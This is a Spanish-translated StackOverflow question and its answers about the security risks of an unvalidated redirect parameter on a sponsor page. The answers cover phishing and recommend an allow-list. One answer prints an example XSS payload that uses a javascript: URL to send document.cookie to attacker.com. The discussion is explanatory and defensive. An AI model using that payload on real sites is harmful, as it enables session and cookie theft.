¿Puedes encontrar el problema de seguridad web aquí?

StackOverflow https://stackoverflow.com/questions/210820

  •  03-07-2019
  •  | 
  •  

Pregunta

Tengo una página web que redirige a otra página web como esta: 

http://www.myOtherServer.com/Sponsor.php?RedirectPage=http://mylink.com/whereIwasgoingtogo.html

Luego, la página Sponsor.php muestra un anuncio con un enlace que dice "Continuar a su página". que enlaza con lo pasado en RedirectPage. ¿Hay problemas de seguridad / suplantación de identidad que podrían derivarse de esto? ¿Cuál es la mejor manera de manejar esto? (tenga en cuenta que el usuario no ha iniciado sesión en ninguno de los sitios)

¿Fue útil?

Solución

Es un gran problema. Si te envío un enlace que se ve así: 

 http://cnn.com/sponsor.php?redirectpage=http://bit.ly/jh2l14

Pensarás "Oh, CNN, es un sitio legítimo", y lo abrirás y harás clic en el enlace "Continuar a tu página". Y luego estarás en uno de los sitios porno más desagradables de la red y tendrá una voz masculina gigante en auge anunciando a todos tus compañeros de trabajo " ¡Maldición, quiero! @ $ @ # $ Your ! (& amp; & # 164; & amp; ^ $ & # 167; hasta que no pueda & # 161; & # 8976; ^ (! # ~~ & amp; $ ^ #! @ $ !! " ; y tendrás que explicarle a tu jefe "¡Pensé que era CNN!"

El agujero aquí es tu reputación . Las redirecciones a ciegas como esta son peligrosas.

Y eso es solo un agujero. ¿Qué tal esto? 

 http://cnn.com/sponsor.php?redirectpage=javascript:location.href='http://attacker.com/' + document.cookie

Ahora he editado XSS su sitio y robado las cookies de su usuario. Claro, dices que no hay información de inicio de sesión, pero ¿qué hay de los datos de sesión? O cuando agrega un inicio de sesión más tarde, o alguien más en su empresa usa esta página un año después donde los usuarios inician sesión.

Otros consejos

Esto definitivamente es un riesgo de seguridad. Debe evitar el uso de variables en URL cuando la seguridad está involucrada.

Si bien nada es totalmente seguro, esta es una forma mucho mejor de manejar este problema: http: //www.webmasterworld.com/forum88/2910.htm

Si sponsor.php permite algún valor en RedirectPage Y los anuncios implican un respaldo o alientan a las personas a pensar que están en el camino correcto, lo abrirían para ser parte de un ataque de phishing. Lo que es peor, probablemente se beneficiaría de esos ataques, lo que probablemente disgustaría a las personas.

Mantener una lista de URL permitidas (o patrones que pueden seguir) contribuiría en gran medida a evitar problemas.

Licenciado bajo: CC-BY-SA con atribución
No afiliado a StackOverflow
scroll top